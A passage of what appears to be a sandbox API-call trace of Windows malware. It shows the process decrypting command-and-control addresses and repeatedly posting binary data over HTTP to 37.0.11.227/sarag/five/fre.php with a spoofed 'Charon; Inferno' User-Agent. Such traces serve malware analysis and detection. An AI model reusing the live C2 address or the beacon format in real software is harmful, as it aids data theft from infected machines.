(lpLibFileName="shlwapi") returned 0x76ed0000 [0272.919] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0272.919] GetProcessHeap () returned 0x690000 [0272.920] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0272.920] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0272.920] GetProcessHeap () returned 0x690000 [0272.920] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3c0 [0272.920] socket (af=2, type=1, protocol=6) returned 0x840 [0272.920] connect (s=0x840, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0272.946] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0272.946] GetProcessHeap () returned 0x690000 [0272.946] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0272.946] GetProcessHeap () returned 0x690000 [0272.946] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0272.947] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0272.948] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0272.948] GetProcessHeap () returned 0x690000 [0272.948] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af8c0 [0272.948] GetProcessHeap () returned 0x690000 [0272.948] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0272.948] GetProcessHeap () returned 0x690000 [0272.948] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0272.948] GetProcessHeap () returned 0x690000 [0272.948] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0272.949] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0272.950] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0272.950] GetProcessHeap () returned 0x690000 [0272.950] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0272.950] GetProcessHeap () returned 0x690000 [0272.950] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0272.950] send (s=0x840, buf=0x6ad508*, len=242, flags=0) returned 242 [0272.950] send (s=0x840, buf=0x6aba40*, len=159, flags=0) returned 159 [0272.951] GetProcessHeap () returned 0x690000 [0272.951] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0272.951] recv (in: s=0x840, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0273.427] GetProcessHeap () returned 0x690000 [0273.427] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0273.428] GetProcessHeap () returned 0x690000 [0273.428] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0273.428] GetProcessHeap () returned 0x690000 [0273.429] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af8c0 | out: hHeap=0x690000) returned 1 [0273.429] GetProcessHeap () returned 0x690000 [0273.429] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0273.429] closesocket (s=0x840) returned 0 [0273.430] GetProcessHeap () returned 0x690000 [0273.430] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3c0 | out: hHeap=0x690000) returned 1 [0273.430] GetProcessHeap () returned 0x690000 [0273.430] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0273.430] GetProcessHeap () returned 0x690000 [0273.431] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0273.431] GetProcessHeap () returned 0x690000 [0273.431] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0273.431] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15f8) returned 0x840 [0273.433] Sleep (dwMilliseconds=0xea60) [0273.434] GetProcessHeap () returned 0x690000 [0273.434] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0273.435] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0273.492] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0273.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0273.598] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0273.873] GetProcessHeap () returned 0x690000 [0273.873] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0273.873] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0273.874] CryptImportKey (in: hProv=0x6af078, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0273.875] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0273.875] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0273.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0273.876] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0273.876] GetProcessHeap () returned 0x690000 [0273.876] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0273.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0273.877] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0273.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0273.878] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0273.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0273.880] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0273.880] GetProcessHeap () returned 0x690000 [0273.880] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0273.880] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0273.881] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0273.882] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0273.882] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0273.883] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0273.883] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0273.884] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0273.885] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0273.885] GetProcessHeap () returned 0x690000 [0273.885] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0273.885] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0273.885] GetProcessHeap () returned 0x690000 [0273.886] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0273.886] GetProcessHeap () returned 0x690000 [0273.886] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0273.886] GetProcessHeap () returned 0x690000 [0273.886] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0273.886] GetProcessHeap () returned 0x690000 [0273.886] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0273.887] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0273.888] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0273.901] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0273.901] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0273.910] GetProcessHeap () returned 0x690000 [0273.910] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0273.911] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0273.912] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0273.913] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0273.913] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0273.914] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0273.914] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0273.914] GetProcessHeap () returned 0x690000 [0273.914] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0273.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0273.918] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0273.919] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0273.919] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0273.920] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0273.921] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0273.921] GetProcessHeap () returned 0x690000 [0273.921] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0273.922] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0273.922] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0273.923] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0273.923] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0273.924] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0273.924] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0273.925] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0273.926] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0273.926] GetProcessHeap () returned 0x690000 [0273.926] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0273.926] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0273.926] GetProcessHeap () returned 0x690000 [0273.926] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4e0 [0273.926] socket (af=2, type=1, protocol=6) returned 0x844 [0273.926] connect (s=0x844, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0273.951] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0273.951] GetProcessHeap () returned 0x690000 [0273.951] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0273.951] GetProcessHeap () returned 0x690000 [0273.951] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0273.952] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0273.952] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0273.953] GetProcessHeap () returned 0x690000 [0273.953] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af800 [0273.953] GetProcessHeap () returned 0x690000 [0273.953] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0273.953] GetProcessHeap () returned 0x690000 [0273.953] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0273.953] GetProcessHeap () returned 0x690000 [0273.953] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0273.954] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0273.955] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0273.955] GetProcessHeap () returned 0x690000 [0273.955] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0273.955] GetProcessHeap () returned 0x690000 [0273.955] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0273.955] send (s=0x844, buf=0x6ad508*, len=242, flags=0) returned 242 [0273.956] send (s=0x844, buf=0x6aba40*, len=159, flags=0) returned 159 [0273.956] GetProcessHeap () returned 0x690000 [0273.956] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0273.956] recv (in: s=0x844, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0274.029] GetProcessHeap () returned 0x690000 [0274.029] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0274.030] GetProcessHeap () returned 0x690000 [0274.030] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0274.030] GetProcessHeap () returned 0x690000 [0274.031] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af800 | out: hHeap=0x690000) returned 1 [0274.031] GetProcessHeap () returned 0x690000 [0274.032] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0274.032] closesocket (s=0x844) returned 0 [0274.032] GetProcessHeap () returned 0x690000 [0274.032] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4e0 | out: hHeap=0x690000) returned 1 [0274.032] GetProcessHeap () returned 0x690000 [0274.033] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0274.033] GetProcessHeap () returned 0x690000 [0274.034] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0274.035] GetProcessHeap () returned 0x690000 [0274.035] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0274.035] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15fc) returned 0x844 [0274.055] Sleep (dwMilliseconds=0xea60) [0274.057] GetProcessHeap () returned 0x690000 [0274.057] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0274.058] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.058] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0274.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.068] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0274.075] GetProcessHeap () returned 0x690000 [0274.075] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0274.076] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.077] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0274.077] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.078] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0274.083] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.084] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0274.084] GetProcessHeap () returned 0x690000 [0274.084] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0274.088] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.088] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0274.094] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.095] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0274.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.100] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0274.100] GetProcessHeap () returned 0x690000 [0274.100] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0274.101] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.101] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0274.102] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.102] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0274.103] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.103] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0274.104] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.104] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0274.104] GetProcessHeap () returned 0x690000 [0274.105] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0274.105] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0274.105] GetProcessHeap () returned 0x690000 [0274.106] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0274.106] GetProcessHeap () returned 0x690000 [0274.106] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0274.106] GetProcessHeap () returned 0x690000 [0274.106] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0274.106] GetProcessHeap () returned 0x690000 [0274.106] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0274.107] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.107] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0274.113] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.114] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0274.122] GetProcessHeap () returned 0x690000 [0274.123] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0274.123] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.124] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0274.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.125] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0274.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.126] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0274.126] GetProcessHeap () returned 0x690000 [0274.127] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0274.128] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.128] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0274.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.132] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0274.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.133] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0274.133] GetProcessHeap () returned 0x690000 [0274.133] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0274.133] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.134] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0274.135] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.135] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0274.136] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.136] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0274.137] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.137] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0274.138] GetProcessHeap () returned 0x690000 [0274.138] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0274.138] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0274.138] GetProcessHeap () returned 0x690000 [0274.138] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab460 [0274.138] socket (af=2, type=1, protocol=6) returned 0x848 [0274.138] connect (s=0x848, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0274.165] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), 